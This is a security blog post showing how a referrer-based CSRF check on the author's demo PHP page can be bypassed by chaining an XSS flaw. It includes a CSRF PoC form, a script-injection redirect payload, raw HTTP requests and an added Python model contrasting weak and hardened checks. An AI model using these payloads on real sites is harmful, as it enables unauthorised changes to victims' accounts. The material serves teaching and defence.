Monday 23 June 2014

Referrer CSRF Bypass ( Not Effective But Alternative )

=============================================


Hello all friends, we are meeting again after a very short time ;-)

Today we will see how to bypass referrer-based CSRF protection by chaining it with another vulnerability.

So let's begin

========================================


* First, what is referrer-based CSRF protection? According to OWASP:



Although it is trivial to spoof the referer header on your own browser, it is impossible to do so in a CSRF attack. Checking the referer is a commonly used method of preventing CSRF on embedded network devices because it does not require a per-user state. This makes a referer a useful method of CSRF prevention when memory is scarce. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state which is required to keep track of a synchronization token.

However, checking the referer is considered to be a weaker form of CSRF protection. For example, open redirect vulnerabilities can be used to exploit GET-based requests that are protected with a referer check and some organizations or browser tools remove referrer headers as a form of data protection. There are also common implementation mistakes with referer checks. For example if the CSRF attack originates from an HTTPS domain then the referer will be omitted. In this case the lack of a referer

===================================================================================

So we know that even if an application has no CSRF tokens, it can still be protected against CSRF attacks by a referrer check. There are many ways to bypass this protection. Recently Rahul Sasi showed how referrer-based CSRF protection can be bypassed by using a chained vulnerability; here I describe what I found. Hope you will like it.



======================================================================================



For demonstration purposes I created my own PHP page on my own domain, r00tsh3ll.com.

Here is the first main page (screenshot in the original post).

You can see the source code of this page (screenshot in the original post).

* The same source code is also on pastebin (link in the original post).

Let's move on to the attack and the bypass technique.

Here I created a simple POST-based form with two text boxes, used to update user information such as name and work. This is the HTTP POST request that updates the user's name and work:

POST /refcsrftest/referrer.php HTTP/1.1
Host: r00tsh3ll.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://r00tsh3ll.com/refcsrftest/referrer.php
Cookie: PHPSESSID=5a6a56a7e4e2e67bd1c89537b813388e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

name=Narendra+Bhati&work=Security+Analyst

==========================================

As you can see, there is no CSRF token to prevent CSRF attacks, so let's try to perform one.

We will use a simple CSRF PoC HTML page:

-------------------------------------------------------

<html>
<body>
<!-- cross-site POST to the update page; the stray "form" attribute in the original tag is removed -->
<form name="myForm" action="http://r00tsh3ll.com/refcsrftest/referrer.php" method="POST">
<input type="hidden" name="name" value="CSRF">
<input type="hidden" name="work" value="Attack Triaged">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

---------------------------------------------------------------------------------------------------------------------

When submitted from the attacker's page, this HTML form sends an HTTP POST request to r00tsh3ll.com. Hopefully the update will go through.

In response we got this (screenshot in the original post):

Ooooops !!!! :o "Referrer Is Not Matched CSRF Attack Detected"

And this is the HTTP request that was sent when our CSRF PoC HTML page was executed (screenshot in the original post).

So our CSRF attack did not execute and we got this response instead. referrer.php protects the form against submissions whose Referer header is missing or points to an unknown or external origin: when our page submits the form, referrer.php asks "did this request come from r00tsh3ll.com?", the answer is no, and the request is rejected with the error page shown above (screenshot in the original post).




=============================================================================

As we read earlier, referrer-based CSRF protection is deployed here: referrer.php always looks at the Referer value, executes the request only if it came from r00tsh3ll.com (the valid domain), and otherwise responds with some kind of error message.



Here comes the cool part.

By using a chained vulnerability we can bypass the referrer-based CSRF protection. A chained vulnerability means using one vulnerability to exploit another weakness in the same system or application.

Here we will use XSS as the chained vulnerability. XSS means the attacker controls script running in the victim's browser in the context of the target origin, and the good news is that the Referer header is also set by the browser, from the page a request is made from. So any request that injected script causes the browser to make from a page on r00tsh3ll.com carries a Referer of r00tsh3ll.com. Bingo ;-)

Somehow we have to find an XSS vulnerability in the same application to exploit this. Suppose there is another parameter, "id", that is vulnerable to XSS. Here I inject an XSS payload that redirects the user to an attacker-chosen URL on the same domain when the XSS triggers:

===================================================

POST /refcsrftest/referrer.php?id=<script type="text/javascript"><!--window.location="http://r00tsh3ll.com/refcsrftest/referrer.php?name=Narendra+ Bhati&work=Hacking";//--></script></head> HTTP/1.1
Host: r00tsh3ll.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=5a6a56a7e4e2e67bd1c89537b813388e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 29




Note that the redirect URL carries the POST parameters in the query string, i.e. I am sending them with a GET request. This works because many web applications accept the same parameters over GET as over POST (PHP code that reads $_REQUEST instead of $_POST, for example); even large sites such as Facebook and Google do this on some endpoints, the only difference being that there the parameters are harmless ;-)



Now, what actually happens: when the XSS triggers, it redirects the victim to "http://r00tsh3ll.com/refcsrftest/referrer.php?name=Narendra+ Bhati&work=Hacking". referrer.php then checks whether the request came from r00tsh3ll.com, and the answer is a big YES, because the redirect was issued from the original page on r00tsh3ll.com where the XSS triggered, so the browser sends the CSRF request with a Referer of r00tsh3ll.com.

When this redirection happens, the HTTP request looks like this:

GET /refcsrftest/referrer.php?name=Narendra+%20Bhati&work=Hacking HTTP/1.1
Host: r00tsh3ll.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://r00tsh3ll.com/refcsrftest/referrer.php
Cookie: PHPSESSID=5a6a56a7e4e2e67bd1c89537b813388e
Connection: keep-alive
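To make the two properties the chain depends on concrete (a referrer check that trusts whatever host appears in the Referer, and a handler that accepts GET parameters in place of POST parameters), here is an added Python model written for this page. It is not the post's referrer.php, whose source appears only as a screenshot: the handler names (weak_update, strict_update), the assumption that the demo page matches the Referer by substring and reads parameters $_REQUEST-style, and every sample request are assumptions made for the example. It replays the cross-site PoC, the XSS-driven same-origin GET, two Referer edge cases from the OWASP text quoted above, and a hardened handler for comparison.

```python
"""Added example, not the post's referrer.php (whose source is only a
screenshot): a model of the referrer check described above and of the two
properties the chained XSS relies on.  Handler names, their behaviour and
every sample request are assumptions made for this example."""
from urllib.parse import urlsplit, parse_qs
import hmac

TARGET_HOST = "r00tsh3ll.com"            # demo domain from the post
PAGE = "/refcsrftest/referrer.php"


def _params(qs):
    """Flatten a query or body string the way a form handler sees it."""
    return {k: v[0] for k, v in parse_qs(qs).items()}


def weak_referer_ok(headers):
    """The style of check the post describes: the Referer must mention
    our domain.  A bare substring test, with no URL parsing (assumed)."""
    return TARGET_HOST in headers.get("Referer", "")


def weak_update(method, url, body, headers, profile):
    """Hypothetical model of the demo page: merges query-string and body
    parameters (PHP $_REQUEST semantics, so a GET works like a POST) and
    applies the update as soon as the Referer check passes."""
    if not weak_referer_ok(headers):
        return "Referrer Is Not Matched CSRF Attack Detected"
    params = _params(urlsplit(url).query)
    params.update(_params(body))
    profile.update({k: params[k] for k in ("name", "work") if k in params})
    return "Updated"


def strict_referer_ok(headers):
    """Parse the Referer and compare the host exactly; a missing header
    fails closed instead of being waved through."""
    referer = headers.get("Referer")
    if not referer:
        return False
    parts = urlsplit(referer)
    return parts.scheme in ("http", "https") and parts.hostname == TARGET_HOST


def strict_update(method, url, body, headers, session, profile):
    """Hardened variant: POST only, exact-host Referer check, and a
    per-session synchronizer token compared in constant time."""
    if method != "POST":
        return "Method not allowed"
    if not strict_referer_ok(headers):
        return "Referer check failed"
    params = _params(body)                      # body only, never the query
    expected = session.get("csrf_token", "")
    if not hmac.compare_digest(params.get("csrf_token", ""), expected):
        return "Token check failed"
    profile.update({k: params[k] for k in ("name", "work") if k in params})
    return "Updated"


def run_scenarios():
    """Replay the requests from the post plus two Referer edge cases.
    All requests below are constructed for this example."""
    same_origin = {"Referer": f"http://{TARGET_HOST}{PAGE}"}
    profile = {"name": "Narendra Bhati", "work": "Security Analyst"}
    results = {}

    # 1. The plain CSRF PoC form submitted from the attacker's page.
    results["cross_site_post"] = weak_update(
        "POST", PAGE, "name=CSRF&work=Attack+Triaged",
        {"Referer": "http://attacker.example/csrf.html"}, profile)

    # 2. The navigation caused by the injected script: a same-origin GET,
    #    so the browser itself supplies a Referer of r00tsh3ll.com.
    results["xss_redirect_get"] = weak_update(
        "GET", PAGE + "?name=Narendra+%20Bhati&work=Hacking", "",
        same_origin, profile)
    results["work_after_xss"] = profile["work"]

    # 3. Substring-check mistakes that need no XSS at all.
    lookalike = {"Referer": f"http://{TARGET_HOST}.attacker.example/"}
    in_query = {"Referer": f"http://attacker.example/?{TARGET_HOST}"}
    results["weak_lookalike"] = weak_referer_ok(lookalike)
    results["weak_in_query"] = weak_referer_ok(in_query)
    results["strict_lookalike"] = strict_referer_ok(lookalike)
    results["strict_in_query"] = strict_referer_ok(in_query)

    # 4. The same requests against the hardened handler.  A token does not
    #    stop script running on the target origin (it can read the token);
    #    it stops the pure cross-site case the Referer check was meant for.
    session = {"csrf_token": "c0ffee"}          # constructed session value
    results["strict_get"] = strict_update(
        "GET", PAGE + "?work=Hacking", "", same_origin, session, profile)
    results["strict_post_no_token"] = strict_update(
        "POST", PAGE, "work=Hacking", same_origin, session, profile)
    results["strict_post_with_token"] = strict_update(
        "POST", PAGE, "work=Hacking&csrf_token=c0ffee",
        same_origin, session, profile)
    return results
```

Call run_scenarios() to see the outcomes side by side: the weak handler rejects the cross-site PoC but accepts the same-origin GET (and two forged Referers that merely contain the domain name), while the strict handler rejects the GET outright and the tokenless POST as well. The point of the strict variant is the combination: exact origin parsing closes the substring mistakes, POST-only removes the GET-as-POST shortcut, and the token covers the case where the Referer is stripped.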





=============================================================================



Here referrer.php believes the request came from r00tsh3ll.com: it checks the HTTP Referer value, finds its own domain, and says "oh yes it is... let's execute it" =D ;-)

"Referrer CSRF Bypass"

The limitation the title admits: an XSS on the target origin already lets injected script send same-origin requests directly and read any anti-CSRF token present in the page, so this is an alternative way of demonstrating how weak a referrer check is, not a bypass that works without a second bug.








